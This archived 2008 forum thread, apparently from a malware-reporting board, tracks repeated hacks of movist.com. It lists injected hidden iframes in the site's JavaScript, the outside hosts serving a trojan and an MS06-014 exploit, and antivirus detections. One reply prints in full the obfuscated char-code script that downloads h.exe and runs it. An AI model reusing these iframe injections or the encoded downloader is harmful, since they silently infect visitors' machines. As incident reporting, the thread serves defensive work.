Author Topic: movist.com (Read 10347 times)

pcaccent · March 10, 2008, 11:09:01 pm

Quote

hxxp://www.movist.com/
hxxp://www.movist.com/inc/cssjs/movist.js
document.write('<IFrame height=0 width=0 src="hxxp://121.125.78.130/comm.htm"></iframe>');
1) hxxp://121.125.78.130/H.exe
2) MS06-014
3) Dr.Web : Trojan.PWS.Gamania.7879
V3 : x
NOD32 : x
Hauri : x
document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/wab/logo.gef'></iframe>");
x

JohnC · March 11, 2008, 12:08:42 am

Thank you.

pcaccent · March 11, 2008, 10:50:00 pm

march. 10. 2008

Quote

document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/wab/logo.gef'></iframe>");

I think that chinese cracker have some mistake.

logo.gef (x)

so, today, movist.com

Quote

//document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

download malware from

Quote

hxxp://www.17173.com.my/pic/ok.hlp

1) MS06-014
2) NOD32 : x
Dr.Web : Trojan.PWS.Gamania.6598
V3 : x
Virobot : x

I guess chinese cracker.... anther mistake... he didn't remove "//"

JohnC · March 12, 2008, 04:43:01 pm

Yeah, when I tried the other day it didn't work. Thanks

pcaccent · March 13, 2008, 12:48:20 am

first :

Quote

hxxp://222.233.53.126/help.htm

second :

Quote

hxxp://121.125.78.130/comm.htm

third :

Quote

hxxp://naver.8866.org/wab/logo.gef

fourth, today(March 13, 2008, 09:51:01 AM) GMT+9

Quote

document.write('<IframE height=0 width=0 src="hxxp://222.233.53.123/help.htm"></iFramE>');

Quote

hxxp://www.movist.com/inc/cssjs/movist.js

crunchtime · March 13, 2008, 06:26:47 am

Quote

hxxp://222.233.53.126/help.htm

Current help.html code:

Code: [Select]

<script>
t="60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,115,99,114,105,112,116,34,62,13,10,102,117,110,99,116,105,111,110,32,105,110,105,116,40,41,32,123,32,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,78,111,32,119,101,98,32,115,105,116,101,32,105,115,32,99,111,110,102,105,103,117,114,101,100,32,97,116,32,116,104,105,115,32,97,100,100,114,101,115,115,46,34,41,59,13,10,13,10,125,13,10,119,105,110,100,111,119,46,111,110,108,111,97,100,32,61,32,105,110,105,116,59,13,10,60,47,115,99,114,105,112,116,62,13,10,60,104,116,109,108,62,13,10,60,116,105,116,108,101,62,52,48,52,60,47,116,105,116,108,101,62,13,10,60,47,104,116,109,108,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,101,120,101,32,61,32,34,104,116,116,112,58,47,47,50,50,50,46,50,51,51,46,53,51,46,49,50,54,47,104,46,101,120,101,34,13,10,120,49,61,34,111,34,38,34,98,106,34,38,34,101,34,38,34,99,116,34,13,10,120,50,61,34,99,108,115,34,38,34,105,100,58,66,68,57,34,38,34,54,67,53,34,38,34,53,54,45,54,34,38,34,53,34,38,34,65,51,45,49,34,38,34,49,68,34,38,34,48,45,57,56,34,38,34,51,34,38,34,65,45,48,48,34,38,34,67,48,34,38,34,52,70,34,38,34,67,50,34,38,34,57,69,51,54,34,13,10,120,51,61,34,99,34,38,34,108,97,34,38,34,115,115,34,38,34,105,100,34,13,10,120,52,61,34,77,105,99,34,38,34,114,111,115,111,34,38,34,102,116,46,88,77,34,38,34,76,72,84,34,38,34,84,80,34,13,10,120,53,61,34,65,100,34,38,34,111,100,34,38,34,98,46,83,116,34,38,34,114,34,38,34,101,97,109,34,13,10,120,54,61,34,71,34,38,34,69,84,34,13,10,120,55,61,34,83,99,114,34,38,34,105,112,34,38,34,116,105,110,103,46,70,105,108,34,38,34,101,83,34,38,34,121,115,116,34,38,34,101,109,79,34,38,34,98,106,101,99,116,34,13,10,120,56,61,34,83,104,101,34,38,34,108,108,46,65,34,38,34,112,112,108,34,38,34,105,99,97,116,105,34,38,34,111,110,34,13,10,13,10,83,101,116,32,118,118,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,120,49,41,13,10,118,118,46,83,101,116,65,116,116,114,105,98,117,116,101,32,120,51,44,32,120,50,13,10,88,77,76,72,84,84,80,61,120,52,13,10,83,101,116,32,120,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,88,77,76,72,84,84,80,44,34,34,41,13,10,68,53,61,120,53,13,10,68,54,61,68,53,13,10,83,101,116,32,83,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,68,54,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,118,118,50,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,118,118,50,44,32,101,120,101,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,118,118,46,99,111,109,34,13,10,83,101,116,32,70,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,83,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,83,101,116,32,81,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,13,10,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>

Downloads this:

Quote

hxxp://222.233.53.126/h.exe

VirusTotal results for h.exe:
File h.exe received on 03.12.2008 02:57:08 (CET)
Current status: finished
Result: 14/32 (43.75%)

JohnC · March 13, 2008, 03:13:35 pm

Thanks

pcaccent · March 15, 2008, 08:10:53 am

again, again, again!!! cracked movist.com

5th : today(March 15, 2008, 05:21:01 PM) GMT+9

Quote

hxxp://www.movist.com/
<iframe src=hxxp://222.233.53.123/help.htm width=0 height=0></iframe>
-hxxp://222.233.53.123/h.exe
<script src=hxxp://222.233.53.123/help.htm></script>
- hxxp://222.233.53.123/h.exe

Quote

hxxp://www.movist.com/inc/cssjs/movist.js
document.write('<IframE height=0 width=0 src="hxxp://222.233.53.123/help.htm"></iFramE>');
- hxxp://222.233.53.123/h.exe
docdsument.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");
- hxxp://www.17173.com.my/pic/ok.hlp
same url

pcaccent · March 17, 2008, 12:54:42 pm

6th : today(March 17, 2008, 09:48:01 PM) GMT+9

Quote

document.write('<iframe height=0 width=0 src="hxxp://www.eosoccer.com/images/icon/bu_arrow.gif"></iframe>');

Quote

hxxp://www.movist.com/
hxxp://www.movist.com/inc/cssjs/movist.js
hxxp://img8.zol.com.cn/bbs/upload/205/204945_600.jpg
- hot picture!
hxxp://www.eosoccer.com/images/icon/bu_arrow.gif
- hxxp://121.125.78.130/h.exe
- MS06-014 exploit

7th : today(March 17, 2008, 11:28:01 PM) GMT+9
changed url

Quote

hxxp://www.movist.com/
hxxp://www.movist.com/inc/cssjs/movist.js
document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

8th : today(March 18, 2008, 09:01:01 AM) GMT+9

Quote

hxxp://www.movist.com/
<iframe height=0 width=0 src="hxxp://121.125.78.130/help.htm"></iframe>
hxxp://121.125.78.130/h.exe
hxxp://www.movist.com/inc/cssjs/movist.js
document.write('<iframe height=0 width=0 src="hxxp://121.125.78.130/help.htm"></iframe>');
hxxp://121.125.78.130/h.exe
document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

pcaccent · March 20, 2008, 11:28:07 am

9th : today(March 20, 2008, 08:28:01 PM) GMT+9

Quote

hxxp://www.movist.com/
hxxp://www.movist.com/inc/cssjs/movist.js
document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');

pcaccent · March 22, 2008, 12:05:08 am

10th : today(March 22, 2008, 09:04:01 AM) GMT+9
.

Quote

hxxp://www.movist.com/inc/cssjs/movist.js
document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');
document.write('<iframe height=0 width=0 src="hxxp://221.143.51.218/info/index.htm"></iframe>');
hxxp://221.143.51.218/h.exe
MD5 : 1C86558637B7CFEBA721B89D69A62CAB

pcaccent · March 23, 2008, 07:08:34 am

11th : today(March 23, 2008, 04:07:01 PM) GMT+9

Quote

hxxp://www.movist.com/inc/cssjs/movist.js
document.write('<iframe height=0 width=0 src="hxxp://221.139.48.211:81/index.htm"></iframe>');
hxxp://221.139.48.211:81/h.exe
MD5 : 1C86558637B7CFEBA721B89D69A62CAB
same file
document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');
- same url

pcaccent · March 30, 2008, 11:05:52 pm

March 31, 2008, 08:05:01 AM(GMT+9)

Quote

document.write('<iframe height=0 width=0 src="hxxp://www.musicmoa.net/fla/index.htm"></iframe>');
hxxp://www.musicmoa.net/fla/H.exe

pcaccent · May 09, 2008, 12:24:41 pm

May 09, 2008, 09:23:05 PM(GMT+9)

Quote

hxxp://www.movist.com/
hxxp://211.239.121.161/index.html/
hxxp://211.239.121.161/H.exe

JohnC · May 09, 2008, 08:40:14 pm

Thank you.

Author Topic: movist.com (Read 10347 times)

pcaccent

movist.com

JohnC

Re: movist.com

pcaccent

Re: movist.com

JohnC

Re: movist.com

pcaccent

5th, cracked

crunchtime

Re: movist.com

JohnC

Re: movist.com

pcaccent

Re: movist.com

pcaccent

Re: movist.com

pcaccent

Re: movist.com

pcaccent

Re: movist.com

pcaccent

Re: movist.com

pcaccent

Re: movist.com

pcaccent

Re: movist.com

JohnC

Re: movist.com